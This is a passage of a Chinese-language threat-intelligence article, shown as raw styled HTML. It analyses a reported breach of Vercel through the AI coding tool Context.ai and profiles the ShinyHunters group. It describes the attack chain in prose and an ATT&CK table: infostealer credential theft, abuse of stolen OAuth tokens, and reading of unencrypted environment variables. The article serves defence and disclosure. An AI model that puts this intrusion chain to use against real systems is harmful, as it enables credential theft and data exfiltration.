1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">受感染设备上的浏览器凭据被完整提取，包括Google Workspace、Supabase、Datadog和Authkit的服务密钥。攻击者获取了support@context.ai账户的完整访问权限，该账户具备对Vercel管理端点的直接访问能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三阶段：初始访问与权限维持</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">利用窃取的OAuth访问令牌，攻击者绕过Vercel的正常认证流程，伪装成合法第三方服务访问内部环境。攻击者成功枚举了未被标记为敏感的环境变量，由于Vercel仅对明确标记为&#34;sensitive&#34;的环境变量实施静态加密，非敏感变量处于明文存储状态，攻击者借此实现信息外泄。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">战术技术映射</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">战术阶段</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术编号</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">具体表现</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1078.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">有效账户：云账户</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用窃取的Google Workspace OAuth应用凭据访问Vercel内部系统</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1550.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">使用替代认证材料：应用访问令牌</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">使用合法的OAuth访问令牌绕过认证机制，实现隐身访问</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭证访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1555.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭证来自密码库</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">信息窃取器从浏览器和系统提取存储凭据</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数据外泄</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1041</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过C2通道外泄数据</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">威胁行为体将窃取数据打包并在黑市出售</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">环境变量管理的安全盲区</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Vercel在此次事件中暴露了一个关键的安全设计缺陷：仅对标记为&#34;sensitive&#34;的环境变量执行服务端静态加密。这一设计假设所有敏感配置都会被开发人员主动标记，但实际上大量包含内部访问密钥、集成token和配置参数的变量处于未保护状态。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者正是利用这一盲区，通过读取未加密的环境变量获取进一步横向移动所需的凭据。这一发现对云原生开发环境的安全架构设计具有重要警示意义。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体分析：ShinyHunters组织追踪</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">组织画像</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">ShinyHunters是一个以数据窃取和勒索为主要业务模式的黑客组织，长期活跃于BreachForums等地下黑产平台。该组织以大规模数据泄露事件闻名，曾先后泄露Microsoft、Tokopedia、Clubhouse、Nitro PDF等知名企业的用户数据。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">已知活动特征</span></strong><span leaf="">：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">偏好攻击拥有大量用户数据或高价值知识产权的目标</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">通常在数据泄露后选择出售或勒索，而非直接公开</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">具备从供应链上游突破目标的能力，善于识别第三方服务的安全弱点</span></p></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">历史关联活动</span></strong><span leaf="">：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2020年：泄露印度最大在线教育平台Unacademy超过2000万用户数据</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2021年：泄露AT&amp;T超过7000万客户信息</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2022年：泄露Microsoft必应搜索数据及内部代码</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2024-2026年：将攻击重心转向企业服务提供商和SaaS平台</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击能力评估</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">基于此次Vercel事件的完整攻击链分析，ShinyHunters具备以下能力：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">供应链识别能力<span textstyle="" style="font-weight: normal;">：能够系统性地识别目标企业的第三方依赖关系</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">信息窃取器运用能力<span textstyle="" style="font-weight: normal;">：熟练使用Lumma、Raccoon等主流窃密木马实施初始渗透</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">OAuth滥用技术<span textstyle="" style="font-weight: normal;">：深度理解OAuth认证机制，可利用第三方应用劫持目标系统</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">数据变现渠道<span textstyle="" style="font-weight: normal;">：拥有成熟的地下数据销售渠道和买家资源</span></span></strong></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">供应链安全影响评估</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第三方AI工具的风险敞口</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Context.ai作为一款面向开发者的AI代码辅助工具，具备天然的信任优势。用户通常会赋予该类工具较高的系统权限，以便其访问代码库、集成开发环境和企业协作平台。然而，这种信任模型一旦被攻陷，将直接转化为攻击者的通行证。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心的监测数据显示，2025年以来针对AI辅助开发工具的攻击事件呈明显上升趋势。攻击者意识到：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">AI工具通常需要持久化访问权限以提供流畅的使用体验</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">开发人员倾向于在这类工具中存储长期有效的API密钥</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">AI工具的更新频率高，安全审计往往滞后于功能迭代</span></p></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">开发者安全的系统性风险</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此次事件揭示了现代开发工作流中的多个安全盲区：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">个人设备安全与企业文化冲突</span></strong><span leaf="">：开发人员使用个人设备访问企业资源是常态，但个人设备的安全防护水平远低于企业托管设备。当个人设备感染信息窃取器时，企业凭据的泄露几乎不可避免。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 